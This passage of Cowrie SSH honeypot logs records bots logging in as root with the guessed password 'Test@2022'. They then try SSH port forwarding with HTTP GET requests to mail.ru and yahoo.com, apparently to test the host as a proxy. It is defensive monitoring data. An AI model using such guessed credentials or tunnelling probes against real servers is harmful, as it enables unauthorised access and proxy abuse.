a2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.196812Z","src_ip":"77.83.207.83","session":"0815bb4af196"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.445661Z","src_ip":"77.83.207.83","session":"0815bb4af196"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4280,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4280","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.497354Z","session":"0815bb4af196"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.547415Z","src_ip":"77.83.207.83","session":"0815bb4af196"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":14590,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14590","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.688293Z","session":"0815bb4af196"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.738352Z","src_ip":"77.83.207.83","session":"0815bb4af196"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":4265,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4265","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.880312Z","session":"0815bb4af196"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.930215Z","src_ip":"77.83.207.83","session":"0815bb4af196"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:06.981127Z","src_ip":"77.83.207.83","session":"0815bb4af196"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7418,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a8653166a44","protocol":"ssh","message":"New connection: 77.83.207.83:7418 (1.2.3.4:22) [session: 9a8653166a44]","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.030639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.040748Z","src_ip":"77.83.207.83","session":"9a8653166a44"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.082017Z","src_ip":"77.83.207.83","session":"9a8653166a44"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.333146Z","src_ip":"77.83.207.83","session":"9a8653166a44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4328,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4328","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.384661Z","session":"9a8653166a44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.434942Z","src_ip":"77.83.207.83","session":"9a8653166a44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4232,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4232","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.576659Z","session":"9a8653166a44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.626895Z","src_ip":"77.83.207.83","session":"9a8653166a44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32908,"dst_ip":"1.2.3.4","dst_port":22,"session":"f826dbb809ea","protocol":"ssh","message":"New connection: 212.227.125.160:32908 (1.2.3.4:22) [session: f826dbb809ea]","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.743958Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":29357,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29357","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.768400Z","session":"9a8653166a44"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.789605Z","src_ip":"212.227.125.160","session":"f826dbb809ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.818387Z","src_ip":"77.83.207.83","session":"9a8653166a44"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.869308Z","src_ip":"77.83.207.83","session":"9a8653166a44"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7502,"dst_ip":"1.2.3.4","dst_port":22,"session":"5838299d7498","protocol":"ssh","message":"New connection: 77.83.207.83:7502 (1.2.3.4:22) [session: 5838299d7498]","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.919222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.919816Z","src_ip":"77.83.207.83","session":"5838299d7498"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:07.971746Z","src_ip":"77.83.207.83","session":"5838299d7498"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.226848Z","src_ip":"77.83.207.83","session":"5838299d7498"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22523,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22523","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.279254Z","session":"5838299d7498"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.330590Z","src_ip":"77.83.207.83","session":"5838299d7498"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.380572Z","src_ip":"212.227.125.160","session":"f826dbb809ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":20054,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20054","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.473356Z","session":"5838299d7498"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.524471Z","src_ip":"77.83.207.83","session":"5838299d7498"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":7015,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7015","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.669422Z","session":"5838299d7498"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.720437Z","src_ip":"77.83.207.83","session":"5838299d7498"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.772118Z","src_ip":"77.83.207.83","session":"5838299d7498"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7585,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac1bf4ee829f","protocol":"ssh","message":"New connection: 77.83.207.83:7585 (1.2.3.4:22) [session: ac1bf4ee829f]","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.821019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.821856Z","src_ip":"77.83.207.83","session":"ac1bf4ee829f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:08.872067Z","src_ip":"77.83.207.83","session":"ac1bf4ee829f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.122823Z","src_ip":"77.83.207.83","session":"ac1bf4ee829f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24712,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24712","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.175446Z","session":"ac1bf4ee829f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.225740Z","src_ip":"77.83.207.83","session":"ac1bf4ee829f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":2752,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:2752","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.368598Z","session":"ac1bf4ee829f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.418941Z","src_ip":"77.83.207.83","session":"ac1bf4ee829f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":22523,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22523","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.560698Z","session":"ac1bf4ee829f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.611192Z","src_ip":"77.83.207.83","session":"ac1bf4ee829f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.662108Z","src_ip":"77.83.207.83","session":"ac1bf4ee829f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":7669,"dst_ip":"1.2.3.4","dst_port":22,"session":"175aec167ba9","protocol":"ssh","message":"New connection: 77.83.207.83:7669 (1.2.3.4:22) [session: 175aec167ba9]","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.711472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.712276Z","src_ip":"77.83.207.83","session":"175aec167ba9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:09.762801Z","src_ip":"77.83.207.83","session":"175aec167ba9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.013738Z","src_ip":"77.83.207.83","session":"175aec167ba9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17056,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17056","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.065045Z","session":"175aec167ba9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.115437Z","src_ip":"77.83.207.83","session":"175aec167ba9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":28462,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28462","sensor":"my-vps","timestamp":"2025-08-31T03:49:10.256646Z","session":"175aec167ba9"}
